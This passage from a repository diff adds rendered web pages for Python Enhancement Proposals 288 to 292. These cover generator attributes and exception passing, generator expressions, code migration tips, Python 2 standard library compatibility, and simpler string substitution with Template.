Enabling attribute assignments allows data to be passed to and from +running generators. The approach of sharing data using attributes +pervades Python. Other approaches exist but are somewhat hackish +in comparison.

+

Another evolutionary step is to add a generator method to allow +exceptions to be passed to a generator. Currently, there is no +clean method for triggering exceptions from outside the generator. +Also, generator exception passing helps mitigate the try/finally +prohibition for generators. The need is especially acute for +generators needing to flush buffers or close resources upon termination.

+

The two proposals are backwards compatible and require no new +keywords. They are being recommended for Python version 2.5.

+
+
+

Specification for Generator Attributes

+

Essentially, the proposal is to emulate attribute writing for classes. +The only wrinkle is that generators lack a way to refer to instances of +themselves. So, the proposal is to provide a function for discovering +the reference. For example:

+
def mygen(filename):
+    self = sys.get_generator()
+    myfile = open(filename)
+    for line in myfile:
+        if len(line) < 10:
+            continue
+        self.pos = myfile.tell()
+        yield line.upper()
+
+g = mygen('sample.txt')
+line1 = g.next()
+print 'Position', g.pos
+
+
+

Uses for generator attributes include:

+
    +
  1. Providing generator clients with extra information (as shown +above).
  2. +
  3. Externally setting control flags governing generator operation +(possibly telling a generator when to step in or step over +data groups).
  4. +
  5. Writing lazy consumers with complex execution states +(an arithmetic encoder output stream for example).
  6. +
  7. Writing co-routines (as demonstrated in Dr. Mertz’s articles [1]).
  8. +
+

The control flow of ‘yield’ and ‘next’ is unchanged by this +proposal. The only change is that data can passed to and from the +generator. Most of the underlying machinery is already in place, +only the access function needs to be added.

+
+
+

Specification for Generator Exception Passing

+

Add a .throw(exception) method to the generator interface:

+
def logger():
+    start = time.time()
+    log = []
+    try:
+        while True:
+            log.append(time.time() - start)
+            yield log[-1]
+    except WriteLog:
+        writelog(log)
+
+g = logger()
+for i in [10,20,40,80,160]:
+    testsuite(i)
+    g.next()
+g.throw(WriteLog)
+
+
+

There is no existing work-around for triggering an exception +inside a generator. It is the only case in Python where active +code cannot be excepted to or through.

+

Generator exception passing also helps address an intrinsic +limitation on generators, the prohibition against their using +try/finally to trigger clean-up code (PEP 255).

+

Note A: The name of the throw method was selected for several +reasons. Raise is a keyword and so cannot be used as a method +name. Unlike raise which immediately raises an exception from the +current execution point, throw will first return to the generator +and then raise the exception. The word throw is suggestive of +putting the exception in another location. The word throw is +already associated with exceptions in other languages.

+

Alternative method names were considered: resolve(), signal(), +genraise(), raiseinto(), and flush(). None of these fit as well +as throw().

+

Note B: To keep the throw() syntax simple only the instance +version of the raise syntax would be supported (no variants for +“raise string” or “raise class, instance”).

+

Calling g.throw(instance) would correspond to writing +raise instance immediately after the most recent yield.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0288.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0289/index.html b/pep-0289/index.html new file mode 100644 index 00000000000..b4f7b000429 --- /dev/null +++ b/pep-0289/index.html @@ -0,0 +1,406 @@ + + + + + + + + PEP 289 – Generator Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 289 – Generator Expressions

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2002
+
Python-Version:
+
2.4
+
Post-History:
+
22-Oct-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces generator expressions as a high performance, +memory efficient generalization of list comprehensions PEP 202 and +generators PEP 255.

+
+
+

Rationale

+

Experience with list comprehensions has shown their widespread +utility throughout Python. However, many of the use cases do +not need to have a full list created in memory. Instead, they +only need to iterate over the elements one at a time.

+

For instance, the following summation code will build a full list of +squares in memory, iterate over those values, and, when the reference +is no longer needed, delete the list:

+
sum([x*x for x in range(10)])
+
+
+

Memory is conserved by using a generator expression instead:

+
sum(x*x for x in range(10))
+
+
+

Similar benefits are conferred on constructors for container objects:

+
s = set(word  for line in page  for word in line.split())
+d = dict( (k, func(k)) for k in keylist)
+
+
+

Generator expressions are especially useful with functions like sum(), +min(), and max() that reduce an iterable input to a single value:

+
max(len(line)  for line in file  if line.strip())
+
+
+

Generator expressions also address some examples of functionals coded +with lambda:

+
reduce(lambda s, a: s + a.myattr, data, 0)
+reduce(lambda s, a: s + a[3], data, 0)
+
+
+

These simplify to:

+
sum(a.myattr for a in data)
+sum(a[3] for a in data)
+
+
+

List comprehensions greatly reduced the need for filter() and map(). +Likewise, generator expressions are expected to minimize the need +for itertools.ifilter() and itertools.imap(). In contrast, the +utility of other itertools will be enhanced by generator expressions:

+
dotproduct = sum(x*y for x,y in itertools.izip(x_vector, y_vector))
+
+
+

Having a syntax similar to list comprehensions also makes it easy to +convert existing code into a generator expression when scaling up +application.

+

Early timings showed that generators had a significant performance +advantage over list comprehensions. However, the latter were highly +optimized for Py2.4 and now the performance is roughly comparable +for small to mid-sized data sets. As the data volumes grow larger, +generator expressions tend to perform better because they do not +exhaust cache memory and they allow Python to re-use objects between +iterations.

+
+
+

BDFL Pronouncements

+

This PEP is ACCEPTED for Py2.4.

+
+
+

The Details

+

(None of this is exact enough in the eye of a reader from Mars, but I +hope the examples convey the intention well enough for a discussion in +c.l.py. The Python Reference Manual should contain a 100% exact +semantic and syntactic specification.)

+
    +
  1. The semantics of a generator expression are equivalent to creating +an anonymous generator function and calling it. For example:
    g = (x**2 for x in range(10))
    +print g.next()
    +
    +
    +

    is equivalent to:

    +
    def __gen(exp):
    +    for x in exp:
    +        yield x**2
    +g = __gen(iter(range(10)))
    +print g.next()
    +
    +
    +

    Only the outermost for-expression is evaluated immediately, the other +expressions are deferred until the generator is run:

    +
    g = (tgtexp  for var1 in exp1 if exp2 for var2 in exp3 if exp4)
    +
    +
    +

    is equivalent to:

    +
    def __gen(bound_exp):
    +    for var1 in bound_exp:
    +        if exp2:
    +            for var2 in exp3:
    +                if exp4:
    +                    yield tgtexp
    +g = __gen(iter(exp1))
    +del __gen
    +
    +
    +
  2. +
  3. The syntax requires that a generator expression always needs to be +directly inside a set of parentheses and cannot have a comma on +either side. With reference to the file Grammar/Grammar in CVS, +two rules change:
      +
    1. The rule:
      atom: '(' [testlist] ')'
      +
      +
      +

      changes to:

      +
      atom: '(' [testlist_gexp] ')'
      +
      +
      +

      where testlist_gexp is almost the same as listmaker, but only +allows a single test after ‘for’ … ‘in’:

      +
      testlist_gexp: test ( gen_for | (',' test)* [','] )
      +
      +
      +
    2. +
    3. The rule for arglist needs similar changes.
    4. +
    +

    This means that you can write:

    +
    sum(x**2 for x in range(10))
    +
    +
    +

    but you would have to write:

    +
    reduce(operator.add, (x**2 for x in range(10)))
    +
    +
    +

    and also:

    +
    g = (x**2 for x in range(10))
    +
    +
    +

    i.e. if a function call has a single positional argument, it can be +a generator expression without extra parentheses, but in all other +cases you have to parenthesize it.

    +

    The exact details were checked in to Grammar/Grammar version 1.49.

    +
  4. +
  5. The loop variable (if it is a simple variable or a tuple of simple +variables) is not exposed to the surrounding function. This +facilitates the implementation and makes typical use cases more +reliable. In some future version of Python, list comprehensions +will also hide the induction variable from the surrounding code +(and, in Py2.4, warnings will be issued for code accessing the +induction variable).

    For example:

    +
    x = "hello"
    +y = list(x for x in "abc")
    +print x    # prints "hello", not "c"
    +
    +
    +
  6. +
  7. List comprehensions will remain unchanged. For example:
    [x for x in S]    # This is a list comprehension.
    +[(x for x in S)]  # This is a list containing one generator
    +                  # expression.
    +
    +
    +

    Unfortunately, there is currently a slight syntactic difference. +The expression:

    +
    [x for x in 1, 2, 3]
    +
    +
    +

    is legal, meaning:

    +
    [x for x in (1, 2, 3)]
    +
    +
    +

    But generator expressions will not allow the former version:

    +
    (x for x in 1, 2, 3)
    +
    +
    +

    is illegal.

    +

    The former list comprehension syntax will become illegal in Python +3.0, and should be deprecated in Python 2.4 and beyond.

    +

    List comprehensions also “leak” their loop variable into the +surrounding scope. This will also change in Python 3.0, so that +the semantic definition of a list comprehension in Python 3.0 will +be equivalent to list(<generator expression>). Python 2.4 and +beyond should issue a deprecation warning if a list comprehension’s +loop variable has the same name as a variable used in the +immediately surrounding scope.

    +
  8. +
+
+
+

Early Binding versus Late Binding

+

After much discussion, it was decided that the first (outermost) +for-expression should be evaluated immediately and that the remaining +expressions be evaluated when the generator is executed.

+

Asked to summarize the reasoning for binding the first expression, +Guido offered [1]:

+
Consider sum(x for x in foo()). Now suppose there's a bug in foo()
+that raises an exception, and a bug in sum() that raises an
+exception before it starts iterating over its argument. Which
+exception would you expect to see? I'd be surprised if the one in
+sum() was raised rather the one in foo(), since the call to foo()
+is part of the argument to sum(), and I expect arguments to be
+processed before the function is called.
+
+OTOH, in sum(bar(x) for x in foo()), where sum() and foo()
+are bugfree, but bar() raises an exception, we have no choice but
+to delay the call to bar() until sum() starts iterating -- that's
+part of the contract of generators. (They do nothing until their
+next() method is first called.)
+
+
+

Various use cases were proposed for binding all free variables when +the generator is defined. And some proponents felt that the resulting +expressions would be easier to understand and debug if bound immediately.

+

However, Python takes a late binding approach to lambda expressions and +has no precedent for automatic, early binding. It was felt that +introducing a new paradigm would unnecessarily introduce complexity.

+

After exploring many possibilities, a consensus emerged that binding +issues were hard to understand and that users should be strongly +encouraged to use generator expressions inside functions that consume +their arguments immediately. For more complex applications, full +generator definitions are always superior in terms of being obvious +about scope, lifetime, and binding [2].

+
+
+

Reduction Functions

+

The utility of generator expressions is greatly enhanced when combined +with reduction functions like sum(), min(), and max(). The heapq +module in Python 2.4 includes two new reduction functions: nlargest() +and nsmallest(). Both work well with generator expressions and keep +no more than n items in memory at one time.

+
+
+

Acknowledgements

+
    +
  • Raymond Hettinger first proposed the idea of “generator +comprehensions” in January 2002.
  • +
  • Peter Norvig resurrected the discussion in his proposal for +Accumulation Displays.
  • +
  • Alex Martelli provided critical measurements that proved the +performance benefits of generator expressions. He also provided +strong arguments that they were a desirable thing to have.
  • +
  • Phillip Eby suggested “iterator expressions” as the name.
  • +
  • Subsequently, Tim Peters suggested the name “generator expressions”.
  • +
  • Armin Rigo, Tim Peters, Guido van Rossum, Samuele Pedroni, +Hye-Shik Chang and Raymond Hettinger teased out the issues surrounding +early versus late binding [1].
  • +
  • Jiwon Seo single-handedly implemented various versions of the proposal +including the final version loaded into CVS. Along the way, there +were periodic code reviews by Hye-Shik Chang and Raymond Hettinger. +Guido van Rossum made the key design decisions after comments from +Armin Rigo and newsgroup discussions. Raymond Hettinger provided +the test suite, documentation, tutorial, and examples [2].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0289.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0290/index.html b/pep-0290/index.html new file mode 100644 index 00000000000..db1d7193a08 --- /dev/null +++ b/pep-0290/index.html @@ -0,0 +1,606 @@ + + + + + + + + PEP 290 – Code Migration and Modernization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 290 – Code Migration and Modernization

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
06-Jun-2002
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is a collection of procedures and ideas for updating Python +applications when newer versions of Python are installed.

+

The migration tips highlight possible areas of incompatibility and +make suggestions on how to find and resolve those differences. The +modernization procedures show how older code can be updated to take +advantage of new language features.

+
+
+

Rationale

+

This repository of procedures serves as a catalog or checklist of +known migration issues and procedures for addressing those issues.

+

Migration issues can arise for several reasons. Some obsolete +features are slowly deprecated according to the guidelines in PEP 4. +Also, some code relies on undocumented behaviors which are +subject to change between versions. Some code may rely on behavior +which was subsequently shown to be a bug and that behavior changes +when the bug is fixed.

+

Modernization options arise when new versions of Python add features +that allow improved clarity or higher performance than previously +available.

+
+
+

Guidelines for New Entries

+

Developers with commit access may update this PEP directly. Others +can send their ideas to a developer for possible inclusion.

+

While a consistent format makes the repository easier to use, feel +free to add or subtract sections to improve clarity.

+

Grep patterns may be supplied as tool to help maintainers locate code +for possible updates. However, fully automated search/replace style +regular expressions are not recommended. Instead, each code fragment +should be evaluated individually.

+

The contra-indications section is the most important part of a new +entry. It lists known situations where the update SHOULD NOT be +applied.

+
+
+

Migration Issues

+
+

Comparison Operators Not a Shortcut for Producing 0 or 1

+

Prior to Python 2.3, comparison operations returned 0 or 1 rather +than True or False. Some code may have used this as a shortcut for +producing zero or one in places where their boolean counterparts are +not appropriate. For example:

+
def identity(m=1):
+    """Create and m-by-m identity matrix"""
+    return [[i==j for i in range(m)] for j in range(m)]
+
+
+

In Python 2.2, a call to identity(2) would produce:

+
[[1, 0], [0, 1]]
+
+
+

In Python 2.3, the same call would produce:

+
[[True, False], [False, True]]
+
+
+

Since booleans are a subclass of integers, the matrix would continue +to calculate normally, but it will not print as expected. The list +comprehension should be changed to read:

+
return [[int(i==j) for i in range(m)] for j in range(m)]
+
+
+

There are similar concerns when storing data to be used by other +applications which may expect a number instead of True or False.

+
+
+
+

Modernization Procedures

+

Procedures are grouped by the Python version required to be able to +take advantage of the modernization.

+
+

Python 2.4 or Later

+
+

Inserting and Popping at the Beginning of Lists

+

Python’s lists are implemented to perform best with appends and pops on +the right. Use of pop(0) or insert(0, x) triggers O(n) data +movement for the entire list. To help address this need, Python 2.4 +introduces a new container, collections.deque() which has efficient +append and pop operations on the both the left and right (the trade-off +is much slower getitem/setitem access). The new container is especially +helpful for implementing data queues:

+

Pattern:

+
c = list(data)   -->   c = collections.deque(data)
+c.pop(0)         -->   c.popleft()
+c.insert(0, x)   -->   c.appendleft()
+
+
+

Locating:

+
grep pop(0 or
+grep insert(0
+
+
+
+
+

Simplifying Custom Sorts

+

In Python 2.4, the sort method for lists and the new sorted +built-in function both accept a key function for computing sort +keys. Unlike the cmp function which gets applied to every +comparison, the key function gets applied only once to each record. +It is much faster than cmp and typically more readable while using +less code. The key function also maintains the stability of the +sort (records with the same key are left in their original order.

+

Original code using a comparison function:

+
names.sort(lambda x,y: cmp(x.lower(), y.lower()))
+
+
+

Alternative original code with explicit decoration:

+
tempnames = [(n.lower(), n) for n in names]
+tempnames.sort()
+names = [original for decorated, original in tempnames]
+
+
+

Revised code using a key function:

+
names.sort(key=str.lower)       # case-insensitive sort
+
+
+

Locating: grep sort *.py

+
+
+

Replacing Common Uses of Lambda

+

In Python 2.4, the operator module gained two new functions, +itemgetter() and attrgetter() that can replace common uses of +the lambda keyword. The new functions run faster and +are considered by some to improve readability.

+

Pattern:

+
lambda r: r[2]      -->  itemgetter(2)
+lambda r: r.myattr  -->  attrgetter('myattr')
+
+
+

Typical contexts:

+
sort(studentrecords, key=attrgetter('gpa'))   # set a sort field
+map(attrgetter('lastname'), studentrecords)   # extract a field
+
+
+

Locating: grep lambda *.py

+
+
+

Simplified Reverse Iteration

+

Python 2.4 introduced the reversed builtin function for reverse +iteration. The existing approaches to reverse iteration suffered +from wordiness, performance issues (speed and memory consumption), +and/or lack of clarity. A preferred style is to express the +sequence in a forwards direction, apply reversed to the result, +and then loop over the resulting fast, memory friendly iterator.

+

Original code expressed with half-open intervals:

+
for i in range(n-1, -1, -1):
+    print seqn[i]
+
+
+

Alternative original code reversed in multiple steps:

+
rseqn = list(seqn)
+rseqn.reverse()
+for value in rseqn:
+    print value
+
+
+

Alternative original code expressed with extending slicing:

+
for value in seqn[::-1]:
+    print value
+
+
+

Revised code using the reversed function:

+
for value in reversed(seqn):
+    print value
+
+
+
+
+
+

Python 2.3 or Later

+
+

Testing String Membership

+

In Python 2.3, for string2 in string1, the length restriction on +string2 is lifted; it can now be a string of any length. When +searching for a substring, where you don’t care about the position of +the substring in the original string, using the in operator makes +the meaning clear.

+

Pattern:

+
string1.find(string2) >= 0   -->  string2 in string1
+string1.find(string2) != -1  -->  string2 in string1
+
+
+
+
+

Replace apply() with a Direct Function Call

+

In Python 2.3, apply() was marked for Pending Deprecation because it +was made obsolete by Python 1.6’s introduction of * and ** in +function calls. Using a direct function call was always a little +faster than apply() because it saved the lookup for the builtin. +Now, apply() is even slower due to its use of the warnings module.

+

Pattern:

+
apply(f, args, kwds)  -->  f(*args, **kwds)
+
+
+

Note: The Pending Deprecation was removed from apply() in Python 2.3.3 +since it creates pain for people who need to maintain code that works +with Python versions as far back as 1.5.2, where there was no +alternative to apply(). The function remains deprecated, however.

+
+
+
+

Python 2.2 or Later

+
+

Testing Dictionary Membership

+

For testing dictionary membership, use the ‘in’ keyword instead of the +‘has_key()’ method. The result is shorter and more readable. The +style becomes consistent with tests for membership in lists. The +result is slightly faster because has_key requires an attribute +search and uses a relatively expensive function call.

+

Pattern:

+
if d.has_key(k):  -->  if k in d:
+
+
+

Contra-indications:

+
    +
  1. Some dictionary-like objects may not define a +__contains__() method:
    if dictlike.has_key(k)
    +
    +
    +
  2. +
+

Locating: grep has_key

+
+
+

Looping Over Dictionaries

+

Use the new iter methods for looping over dictionaries. The +iter methods are faster because they do not have to create a new +list object with a complete copy of all of the keys, values, or items. +Selecting only keys, values, or items (key/value pairs) as needed +saves the time for creating throwaway object references and, in the +case of items, saves a second hash look-up of the key.

+

Pattern:

+
for key in d.keys():      -->  for key in d:
+for value in d.values():  -->  for value in d.itervalues():
+for key, value in d.items():
+                          -->  for key, value in d.iteritems():
+
+
+

Contra-indications:

+
    +
  1. If you need a list, do not change the return type:
    def getids():  return d.keys()
    +
    +
    +
  2. +
  3. Some dictionary-like objects may not define +iter methods:
    for k in dictlike.keys():
    +
    +
    +
  4. +
  5. Iterators do not support slicing, sorting or other operations:
    k = d.keys(); j = k[:]
    +
    +
    +
  6. +
  7. Dictionary iterators prohibit modifying the dictionary:
    for k in d.keys(): del[k]
    +
    +
    +
  8. +
+
+
+

stat Methods

+

Replace stat constants or indices with new os.stat attributes +and methods. The os.stat attributes and methods are not +order-dependent and do not require an import of the stat module.

+

Pattern:

+
os.stat("foo")[stat.ST_MTIME]  -->  os.stat("foo").st_mtime
+os.stat("foo")[stat.ST_MTIME]  -->  os.path.getmtime("foo")
+
+
+

Locating: grep os.stat or grep stat.S

+
+
+

Reduce Dependency on types Module

+

The types module is likely to be deprecated in the future. Use +built-in constructor functions instead. They may be slightly faster.

+

Pattern:

+
isinstance(v, types.IntType)      -->  isinstance(v, int)
+isinstance(s, types.StringTypes)  -->  isinstance(s, basestring)
+
+
+

Full use of this technique requires Python 2.3 or later +(basestring was introduced in Python 2.3), but Python 2.2 is +sufficient for most uses.

+

Locating: grep types *.py | grep import

+
+
+

Avoid Variable Names that Clash with the __builtins__ Module

+

In Python 2.2, new built-in types were added for dict and file. +Scripts should avoid assigning variable names that mask those types. +The same advice also applies to existing builtins like list.

+

Pattern:

+
file = open('myfile.txt') --> f = open('myfile.txt')
+dict = obj.__dict__ --> d = obj.__dict__
+
+
+

Locating: grep 'file ' *.py

+
+
+
+

Python 2.1 or Later

+
+

whrandom Module Deprecated

+

All random-related methods have been collected in one place, the +random module.

+

Pattern:

+
import whrandom --> import random
+
+
+

Locating: grep whrandom

+
+
+
+

Python 2.0 or Later

+
+

String Methods

+

The string module is likely to be deprecated in the future. Use +string methods instead. They’re faster too.

+

Pattern:

+
import string ; string.method(s, ...)  -->  s.method(...)
+c in string.whitespace                 -->  c.isspace()
+
+
+

Locating: grep string *.py | grep import

+
+
+

startswith and endswith String Methods

+

Use these string methods instead of slicing. No slice has to be +created and there’s no risk of miscounting.

+

Pattern:

+
"foobar"[:3] == "foo"   -->  "foobar".startswith("foo")
+"foobar"[-3:] == "bar"  -->  "foobar".endswith("bar")
+
+
+
+
+

The atexit Module

+

The atexit module supports multiple functions to be executed upon +program termination. Also, it supports parameterized functions. +Unfortunately, its implementation conflicts with the sys.exitfunc +attribute which only supports a single exit function. Code relying +on sys.exitfunc may interfere with other modules (including library +modules) that elect to use the newer and more versatile atexit module.

+

Pattern:

+
sys.exitfunc = myfunc  -->  atexit.register(myfunc)
+
+
+
+
+
+

Python 1.5 or Later

+
+

Class-Based Exceptions

+

String exceptions are deprecated, so derive from the Exception +base class. Unlike the obsolete string exceptions, class exceptions +all derive from another exception or the Exception base class. +This allows meaningful groupings of exceptions. It also allows an +“except Exception” clause to catch all exceptions.

+

Pattern:

+
NewError = 'NewError'  -->  class NewError(Exception): pass
+
+
+

Locating: Use PyChecker.

+
+
+
+

All Python Versions

+
+

Testing for None

+

Since there is only one None object, equality can be tested with +identity. Identity tests are slightly faster than equality tests. +Also, some object types may overload comparison, so equality testing +may be much slower.

+

Pattern:

+
if v == None  -->  if v is None:
+if v != None  -->  if v is not None:
+
+
+

Locating: grep '== None' or grep '!= None'

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0290.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0291/index.html b/pep-0291/index.html new file mode 100644 index 00000000000..24f8ff22fb8 --- /dev/null +++ b/pep-0291/index.html @@ -0,0 +1,353 @@ + + + + + + + + PEP 291 – Backward Compatibility for the Python 2 Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 291 – Backward Compatibility for the Python 2 Standard Library

+
+
Author:
+
Neal Norwitz <nnorwitz at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
06-Jun-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
Superseded-By:
+
387
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the packages and modules in the Python 2 +standard library which should remain backward compatible with +previous versions of Python. If a package is not listed here, +then it need only remain compatible with the version of Python it +is distributed with.

+

This PEP has no bearing on the Python 3 standard library.

+
+
+

Rationale

+

Authors have various reasons why packages and modules should +continue to work with previous versions of Python. In order to +maintain backward compatibility for these modules while moving the +rest of the standard library forward, it is necessary to know +which modules can be modified and which should use old and +possibly deprecated features.

+

Generally, authors should attempt to keep changes backward +compatible with the previous released version of Python in order +to make bug fixes easier to backport.

+

In addition to a package or module being listed in this PEP, +authors must add a comment at the top of each file documenting +the compatibility requirement.

+

When a major version of Python is released, a Subversion branch is +created for continued maintenance and bug fix releases. A package +version on a branch may have a different compatibility requirement +than the same package on the trunk (i.e. current bleeding-edge +development). Where appropriate, these branch compatibilities are +listed below.

+
+
+

Features to Avoid

+

The following list contains common features to avoid in order +to maintain backward compatibility with each version of Python. +This list is not complete! It is only meant as a general guide.

+

Note that the features below were implemented in the version +following the one listed. For example, features listed next to +1.5.2 were implemented in 2.0.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VersionFeatures to Avoid
1.5.2string methods, Unicode, list comprehensions, +augmented assignment (eg, +=), zip(), import x as y, +dict.setdefault(), print >> f, +calling f(*args, **kw), plus all features below
2.0nested scopes, rich comparisons, +function attributes, plus all features below
2.1use of object or new-style classes, iterators, +using generators, nested scopes, or // +without from __future__ import … statement, +isinstance(X, TYP) where TYP is a tuple of types, +plus all features below
2.2bool, True, False, basestring, enumerate(), +{}.pop(), PendingDeprecationWarning, +Universal Newlines, plus all features below +plus all features below
2.3generator expressions, multi-line imports, +decorators, int/long unification, set/frozenset, +reversed(), sorted(), “”.rsplit(), +plus all features below
2.4with statement, conditional expressions, +combined try/except/finally, relative imports, +yield expressions or generator.throw/send/close(), +plus all features below
2.5with statement without from __future__ import, +io module, str.format(), except as, +bytes, b’’ literals, property.setter/deleter
+
+
+

Backward Compatible Packages, Modules, and Tools

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Package/ModuleMaintainer(s)Python VersionNotes
2to3Benjamin Peterson2.5
bsddb
    +
  • Greg Smith
  • +
  • Barry Warsaw
  • +
+
2.1
compilerJeremy Hylton2.1
decimalRaymond Hettinger2.3[2]
distutilsTarek Ziade2.3
emailBarry Warsaw2.1 / 2.3[1]
pkgutilPhillip Eby2.3
platformMarc-Andre Lemburg1.5.2
pybenchMarc-Andre Lemburg1.5.2[3]
sreFredrik Lundh2.1
subprocessPeter Astrand2.2
wsgirefPhillip J. Eby2.1
xml (PyXML)Martin v. Loewis2.0
xmlrpclibFredrik Lundh2.1
+ + + + + + + + + + + + + +
ToolMaintainer(s)Python Version
None
+
+

Notes

+
    +
  1. The email package version 2 was distributed with Python up to +Python 2.3, and this must remain Python 2.1 compatible. email +package version 3 will be distributed with Python 2.4 and will +need to remain compatible only with Python 2.3.
  2. +
  3. Specification updates will be treated as bugfixes and backported. +Python 2.3 compatibility will be kept for at least Python 2.4. +The decision will be revisited for Python 2.5 and not changed +unless compelling advantages arise.
  4. +
  5. pybench lives under the Tools/ directory. Compatibility with +older Python versions is needed in order to be able to compare +performance between Python versions. New features may still +be used in new tests, which may then be configured to fail +gracefully on import by the tool in older Python versions.
  6. +
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0291.rst

+

Last modified: 2024-10-10 20:00:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0292/index.html b/pep-0292/index.html new file mode 100644 index 00000000000..a82efbccde0 --- /dev/null +++ b/pep-0292/index.html @@ -0,0 +1,318 @@ + + + + + + + + PEP 292 – Simpler String Substitutions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 292 – Simpler String Substitutions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2002
+
Python-Version:
+
2.4
+
Post-History:
+
18-Jun-2002, 23-Mar-2004, 22-Aug-2004
+
Replaces:
+
215
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a simpler string substitution feature, also +known as string interpolation. This PEP is “simpler” in two +respects:

+
    +
  1. Python’s current string substitution feature +(i.e. %-substitution) is complicated and error prone. This PEP +is simpler at the cost of some expressiveness.
  2. +
  3. PEP 215 proposed an alternative string interpolation feature, +introducing a new $ string prefix. PEP 292 is simpler than +this because it involves no syntax changes and has much simpler +rules for what substitutions can occur in the string.
  4. +
+
+
+

Rationale

+

Python currently supports a string substitution syntax based on +C’s printf()%’ formatting character [1]. While quite rich, +%-formatting codes are also error prone, even for +experienced Python programmers. A common mistake is to leave off +the trailing format character, e.g. the ‘s’ in "%(name)s".

+

In addition, the rules for what can follow a % sign are fairly +complex, while the usual application rarely needs such complexity. +Most scripts need to do some string interpolation, but most of +those use simple ‘stringification’ formats, i.e. %s or %(name)s +This form should be made simpler and less error prone.

+
+
+

A Simpler Proposal

+

We propose the addition of a new class, called Template, which +will live in the string module. The Template class supports new +rules for string substitution; its value contains placeholders, +introduced with the $ character. The following rules for +$-placeholders apply:

+
    +
  1. $$ is an escape; it is replaced with a single $
  2. +
  3. $identifier names a substitution placeholder matching a mapping +key of “identifier”. By default, “identifier” must spell a +Python identifier as defined in [2]. The first non-identifier +character after the $ character terminates this placeholder +specification.
  4. +
  5. ${identifier} is equivalent to $identifier. It is required +when valid identifier characters follow the placeholder but are +not part of the placeholder, e.g. "${noun}ification".
  6. +
+

If the $ character appears at the end of the line, or is followed +by any other character than those described above, a ValueError +will be raised at interpolation time. Values in mapping are +converted automatically to strings.

+

No other characters have special meaning, however it is possible +to derive from the Template class to define different substitution +rules. For example, a derived class could allow for periods in +the placeholder (e.g. to support a kind of dynamic namespace and +attribute path lookup), or could define a delimiter character +other than $.

+

Once the Template has been created, substitutions can be performed +by calling one of two methods:

+
    +
  • substitute(). This method returns a new string which results +when the values of a mapping are substituted for the +placeholders in the Template. If there are placeholders which +are not present in the mapping, a KeyError will be raised.
  • +
  • safe_substitute(). This is similar to the substitute() method, +except that KeyErrors are never raised (due to placeholders +missing from the mapping). When a placeholder is missing, the +original placeholder will appear in the resulting string.

    Here are some examples:

    +
    >>> from string import Template
    +>>> s = Template('${name} was born in ${country}')
    +>>> print s.substitute(name='Guido', country='the Netherlands')
    +Guido was born in the Netherlands
    +>>> print s.substitute(name='Guido')
    +Traceback (most recent call last):
    +[...]
    +KeyError: 'country'
    +>>> print s.safe_substitute(name='Guido')
    +Guido was born in ${country}
    +
    +
    +
  • +
+

The signature of substitute() and safe_substitute() allows for +passing the mapping of placeholders to values, either as a single +dictionary-like object in the first positional argument, or as +keyword arguments as shown above. The exact details and +signatures of these two methods is reserved for the standard +library documentation.

+
+
+

Why $ and Braces?

+

The BDFL said it best [3]: “The $ means “substitution” in so many +languages besides Perl that I wonder where you’ve been. […] +We’re copying this from the shell.”

+

Thus the substitution rules are chosen because of the similarity +with so many other languages. This makes the substitution rules +easier to teach, learn, and remember.

+
+
+

Comparison to PEP 215

+

PEP 215 describes an alternate proposal for string interpolation. +Unlike that PEP, this one does not propose any new syntax for +Python. All the proposed new features are embodied in a new +library module. PEP 215 proposes a new string prefix +representation such as $"" which signal to Python that a new type +of string is present. $-strings would have to interact with the +existing r-prefixes and u-prefixes, essentially doubling the +number of string prefix combinations.

+

PEP 215 also allows for arbitrary Python expressions inside the +$-strings, so that you could do things like:

+
import sys
+print $"sys = $sys, sys = $sys.modules['sys']"
+
+
+

which would return:

+
sys = <module 'sys' (built-in)>, sys = <module 'sys' (built-in)>
+
+
+

